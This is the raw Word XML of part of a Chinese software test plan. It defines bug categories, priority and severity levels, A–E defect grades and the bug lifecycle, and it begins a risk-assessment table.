                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1220" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6D1276CE"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UI自动化</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1193" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7864ACDA" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="0020259A" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1162" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="49482D3E" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="0020259A" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="2122ED4E" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="00536672" w:rsidRDefault="00C55A9C" w:rsidP="00C55A9C">
      <w:pPr>
        <w:pStyle w:val="8lab-2"/>
      </w:pPr>
      <w:bookmarkStart w:id="206" w:name="_Toc36487901"/>
      <w:bookmarkStart w:id="207" w:name="_Toc36573222"/>
      <w:bookmarkStart w:id="208" w:name="_Toc36630299"/>
      <w:r w:rsidRPr="00536672">
        <w:t>Bug分类</w:t>
      </w:r>
      <w:bookmarkEnd w:id="206"/>
      <w:bookmarkEnd w:id="207"/>
      <w:bookmarkEnd w:id="208"/>
    </w:p>
    <w:p w14:paraId="53F68A4C" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="00D56FCB" w:rsidRDefault="00C55A9C" w:rsidP="00C55A9C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D56FCB">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Bug定义：软件程序代码或逻辑错误（业务逻辑）、可改进细节（用户体验）、与需求存在差异的功能实现（用户需求）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="342471F5" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="00D56FCB" w:rsidRDefault="00C55A9C" w:rsidP="00C55A9C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D56FCB">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Bug类型：代码错误、设计缺陷（逻辑设计问题、产品需求问题）、界面优化、性能问题、配置相关、安装部署、安全相关、标准规范、测试脚本、其他</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75349081" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="00D56FCB" w:rsidRDefault="00C55A9C" w:rsidP="00C55A9C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D56FCB">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>其他类型分类：功能类、界面类、性能类、易用性类、兼容性类、其他</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C989028" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="00D56FCB" w:rsidRDefault="00C55A9C" w:rsidP="00C55A9C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D56FCB">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>BUG</w:t>
      </w:r>
      <w:r w:rsidRPr="00D56FCB">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>等级</w:t>
      </w:r>
      <w:r w:rsidRPr="00D56FCB">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>标准主要分两类：依据优先级分类</w:t>
      </w:r>
      <w:r w:rsidRPr="00D56FCB">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r w:rsidRPr="00D56FCB">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>依据严重程度分类。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03DF52EF" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="00536672" w:rsidRDefault="00C55A9C" w:rsidP="00C55A9C">
      <w:pPr>
        <w:pStyle w:val="8lab-3"/>
      </w:pPr>
      <w:bookmarkStart w:id="209" w:name="_Toc36487902"/>
      <w:r w:rsidRPr="00536672">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>依据优先级分类标准</w:t>
      </w:r>
      <w:bookmarkEnd w:id="209"/>
    </w:p>
    <w:p w14:paraId="297D4CCE"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lastRenderedPageBreak/>
        <w:t>紧急</w:t>
      </w:r>
      <w:r w:rsidRPr="00D56FCB">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r w:rsidRPr="00D56FCB">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>系统无法工作</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测试无法继续正常工作</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特殊情况：如重要客户（项目重要性）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46F8343B"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高</w:t>
      </w:r>
      <w:r w:rsidRPr="00D56FCB">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r w:rsidRPr="00D56FCB">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>需求问题</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实现与需求不符</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出现调试代码</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功能性错误</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关联性错误</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前后模块不一致</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链接错误</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特殊性的程度性能低下</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程序引起的安全问题</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涉及所有关于数据流的错误</w:t>
      </w:r>
      <w:r w:rsidRPr="00D56FCB">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AF89A85"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中</w:t>
      </w:r>
      <w:r w:rsidRPr="00D56FCB">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r w:rsidRPr="00D56FCB">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>页面格式错误</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兼容性问题</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校检错误</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图片错误</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文案错误</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E4CA70C"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程序性能低下</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缺少容错性处理</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功能易用程度低</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配置问题</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涉及的所有关于文本的错误</w:t>
      </w:r>
      <w:r w:rsidRPr="00D56FCB">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DB1632F"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低</w:t>
      </w:r>
      <w:r w:rsidRPr="00D56FCB">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r w:rsidRPr="00D56FCB">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>遗留问题</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暂时无法实现技术问题</w:t>
      </w:r>
      <w:r w:rsidRPr="00D56FCB">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r w:rsidRPr="00D56FCB">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>合理建议</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6936C43C" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="00536672" w:rsidRDefault="00C55A9C" w:rsidP="00C55A9C">
      <w:pPr>
        <w:pStyle w:val="8lab-3"/>
      </w:pPr>
      <w:bookmarkStart w:id="210" w:name="_Toc36487903"/>
      <w:r w:rsidRPr="00536672">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>依据严重程度分类</w:t>
      </w:r>
      <w:bookmarkEnd w:id="210"/>
    </w:p>
    <w:p w14:paraId="75131A8B"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致命错误</w:t>
      </w:r>
      <w:r w:rsidRPr="00D56FCB">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>：阻断性bug、影响主干功能、系统死机、死循环、数据泄露引起的安全性问题、恶意攻击造成账户私密信息泄露、 涉及金钱计算</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78EE4426"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严重错误</w:t>
      </w:r>
      <w:r w:rsidRPr="00D56FCB">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>： 重要功能不能实现（主流程功能）、错误波及面比较广，影响功能交互、操作导致程序崩溃、</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00D56FCB">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>死机死</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00D56FCB">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>循环、难以接受的外观缺陷、密码明文显示</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67B9572B"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一般错误</w:t>
      </w:r>
      <w:r w:rsidRPr="00D56FCB">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>（不影响产品运行）：次要功能不能正常体现、操作界面错误、对应列名定义含义不一致、查询错误、数据错误显示、简单的输入控制未放前端控制（基本的简单的格式问题前端控制，减小对后台服务器压力，后端也要进行控制）、删除操作未做提示（针对误操作）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C520614"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细微错误</w:t>
      </w:r>
      <w:r w:rsidRPr="00D56FCB">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>：文字错误、不符合用户习惯、界面不美观、辅助说明描述不清楚、提示窗口未采用行业术语</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01C017F8"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b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>建议优化</w:t>
      </w:r>
      <w:r w:rsidRPr="00D56FCB">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>：对一些功能实现，提出好的优化建议。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41642B62" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="00536672" w:rsidRDefault="00C55A9C" w:rsidP="00C55A9C">
      <w:pPr>
        <w:pStyle w:val="8lab-2"/>
      </w:pPr>
      <w:bookmarkStart w:id="211" w:name="_Toc36487904"/>
      <w:bookmarkStart w:id="212" w:name="_Toc36573223"/>
      <w:bookmarkStart w:id="213" w:name="_Toc36630300"/>
      <w:r w:rsidRPr="00536672">
        <w:t>Bug等级</w:t>
      </w:r>
      <w:bookmarkEnd w:id="211"/>
      <w:bookmarkEnd w:id="212"/>
      <w:bookmarkEnd w:id="213"/>
    </w:p>
    <w:p w14:paraId="3AE1217A"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color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>缺陷分为 A、B、C、D 、E 5个级别：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69CE0BC0" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="0020259A" w:rsidRDefault="00C55A9C" w:rsidP="00C55A9C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0020259A">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
          <w:noProof/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300" wp14:anchorId="52853794" wp14:editId="5BB20946">
            <wp:extent cx="5269865" cy="3978275"/>
            <wp:effectExtent l="0" t="0" r="13335" b="9525"/>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5"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5269865" cy="3978275"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="20A5BB10" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="00536672" w:rsidRDefault="00C55A9C" w:rsidP="00C55A9C">
      <w:pPr>
        <w:pStyle w:val="8lab-2"/>
      </w:pPr>
      <w:bookmarkStart w:id="214" w:name="_Toc36487905"/>
      <w:bookmarkStart w:id="215" w:name="_Toc36573224"/>
      <w:bookmarkStart w:id="216" w:name="_Toc36630301"/>
      <w:r w:rsidRPr="00536672">
        <w:t>Bug生命周期</w:t>
      </w:r>
      <w:bookmarkEnd w:id="214"/>
      <w:bookmarkEnd w:id="215"/>
      <w:bookmarkEnd w:id="216"/>
    </w:p>
    <w:p w14:paraId="11062763"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已指派</w:t>
      </w:r>
      <w:r w:rsidRPr="00D56FCB">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>的bug------已指派给开发的，要留意bug走向，随时跟踪，提醒开发及时修复，修复ok后，待更新测试环境后再进行bug验证</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3421BAE3"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已解决</w:t>
      </w:r>
      <w:r w:rsidRPr="00D56FCB">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>的bug------待更新测试环境后进行验证测试，通过则关闭，不通过则重新打开指派给开发</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D0B599B"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重复</w:t>
      </w:r>
      <w:r w:rsidRPr="00D56FCB">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>bug------- 先查看是否与开发指定bug重复？确定关闭，不重复则说明原因重新打开指派开发</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07793933"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不是缺陷</w:t>
      </w:r>
      <w:r w:rsidRPr="00D56FCB">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>-------确认开发环境是否跟测试环境一致，如果开发所说不是缺陷关闭，确认是与开发沟通未达成一致找产品确认，确认是注明情况再次指派开发</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5093FB3F"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无法重现</w:t>
      </w:r>
      <w:r w:rsidRPr="00D56FCB">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>-------确认开发环境是否跟测试环境一致，包括操作步骤、浏览器、黄精、特定账号等，</w:t>
      </w:r>
      <w:r w:rsidRPr="00D56FCB">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>多个版本验证后重现不了，依据bug严重程度跟产品、开发一起确认关闭，找到重现原因，注明清楚再次指派给开发</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="581A6FAF"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不予解决</w:t>
      </w:r>
      <w:r w:rsidRPr="00D56FCB">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>------ 找产品经理进行确认，确认不予解决进行关闭，需要解决则备注原因打开指派给开发</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="093B7793" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="00D56FCB" w:rsidRDefault="00C55A9C" w:rsidP="00C55A9C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D56FCB">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>设计如此</w:t>
      </w:r>
      <w:r w:rsidRPr="00D56FCB">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>----找产品进行确认，确认设计如此则关闭，确认是问题，则备注原因指派开发</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49670490" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="00D56FCB" w:rsidRDefault="00C55A9C" w:rsidP="00C55A9C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D56FCB">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>延期修改</w:t>
      </w:r>
      <w:r w:rsidRPr="00D56FCB">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>-----看bug严重程度，是否影响当前版本发布？与产品经理确认，不予延期根据情况进行激活与情况说明，确认延期做好记录，以便后续版本进行关注</w:t>
      </w:r>
      <w:bookmarkStart w:id="217" w:name="_Toc227386483"/>
      <w:bookmarkStart w:id="218" w:name="_Toc227386340"/>
      <w:bookmarkStart w:id="219" w:name="_Toc222309958"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1026F111" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="00536672" w:rsidRDefault="00C55A9C" w:rsidP="00C55A9C">
      <w:pPr>
        <w:pStyle w:val="8lab-1"/>
      </w:pPr>
      <w:bookmarkStart w:id="220" w:name="_Toc36487906"/>
      <w:bookmarkStart w:id="221" w:name="_Toc36573225"/>
      <w:bookmarkStart w:id="222" w:name="_Toc36630302"/>
      <w:r w:rsidRPr="00536672">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>风险预估和应对</w:t>
      </w:r>
      <w:bookmarkEnd w:id="217"/>
      <w:bookmarkEnd w:id="218"/>
      <w:bookmarkEnd w:id="219"/>
      <w:bookmarkEnd w:id="220"/>
      <w:bookmarkEnd w:id="221"/>
      <w:bookmarkEnd w:id="222"/>
    </w:p>
    <w:p w14:paraId="40FACA1B" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00C55A9C">
      <w:pPr>
        <w:ind w:firstLineChars="300" w:firstLine="6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下表列出了在此项目的测试工作所存在的各种风险的假定，需要考虑项目测试过程中可能发生的具体事务，分别分析并加以应对，然后体现在测试计划中。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026"/>
        <w:gridCol w:w="992"/>
        <w:gridCol w:w="709"/>
        <w:gridCol w:w="1134"/>
        <w:gridCol w:w="851"/>
        <w:gridCol w:w="1464"/>
        <w:gridCol w:w="993"/>
      </w:tblGrid>
      <w:tr w:rsidR="00C55A9C" w:rsidRPr="0020259A" w14:paraId="01680237" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1067" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E0E0E0"/>
          </w:tcPr>
          <w:p w14:paraId="702838BC"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风险类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1026" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E0E0E0"/>
          </w:tcPr>
          <w:p w14:paraId="521576B6"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风险责任方</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="992" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E0E0E0"/>
          </w:tcPr>
          <w:p w14:paraId="1C780C0C"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风险内容</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="709" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E0E0E0"/>
          </w:tcPr>
          <w:p w14:paraId="4472D95D"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处理优先级</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1134" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E0E0E0"/>
          </w:tcPr>
          <w:p w14:paraId="050996B0"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可能发生的阶段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="851" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E0E0E0"/>
          </w:tcPr>
          <w:p w14:paraId="5BE67F81"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应对所需资源</w:t>
